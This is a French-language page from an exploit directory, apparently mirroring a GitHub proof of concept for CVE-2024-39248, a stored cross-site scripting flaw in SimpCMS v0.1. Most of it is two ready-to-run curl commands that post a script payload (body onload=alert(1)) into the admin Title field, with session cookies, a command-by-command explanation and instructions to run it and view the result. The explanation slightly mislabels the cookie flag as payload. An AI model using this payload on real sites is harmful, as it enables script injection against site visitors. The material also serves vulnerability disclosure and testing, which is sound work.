Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-39248 — Publication pour Cross Site Scripting (XSS) dans SimpCMS v0.1 - /SimpCMS/admin.php | Kitploit
Outils/GitHubGitHub/jasonthename/cve-2024-39248
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

Publication pour Cross Site Scripting (XSS) dans SimpCMS v0.1 - /SimpCMS/admin.php

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Titre de l'exploit : SimpCMS v0.1 - Script intersite (XSS)

CVE: CVE-2024-39248

Auteur de l'exploit : Jason Jacobs (0xjason_jacobs - Twitter)

Page d'accueil du fournisseur : https://sourceforge.net/projects/simpcms/

Point de terminaison vulnérable : /SimpCMS/admin.php

Une vulnérabilité de script intersite (XSS) dans SimpCMS v0.1 permet aux attaquants d'exécuter des scripts web ou du HTML arbitraires via une charge utile spécialement conçue injectée dans le champ Titre à /admin.php.

Paramètres de la commande cURL mis à jour pour la version de SimpCMS actuellement en ligne sur SourceForge :

Après vous être connecté à l'interface d'administration de SimpCMS, copiez les valeurs de Cookie correspondantes observées dans l'onglet Application de l'élément Inspect du navigateur et soumettez la requête curl suivante :

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

Paramètres de la soumission CVE initiale (le même exploit fonctionne) :

Les paramètres initiaux observés pour le logiciel SimpCMS ont abouti à la commande cURL suivante, mais celle-ci a ensuite été mise à jour :

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

Explication :

  • curl : l'outil en ligne de commande pour transférer des données avec des URL.
  • -X POST : spécifie la méthode de requête à utiliser (POST).
  • "http://site.com/SimpCMS/admin.php" : l'URL à laquelle la requête est envoyée.
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - la charge utile de la requête POST.

Exécutez cette commande dans votre terminal pour envoyer la requête POST avec la charge utile XSS. Visitez le site principal /SimpCMS et le XSS sera visible.

CWE: https://cwe.mitre.org/data/definitions/79.html

Télécharger l’outil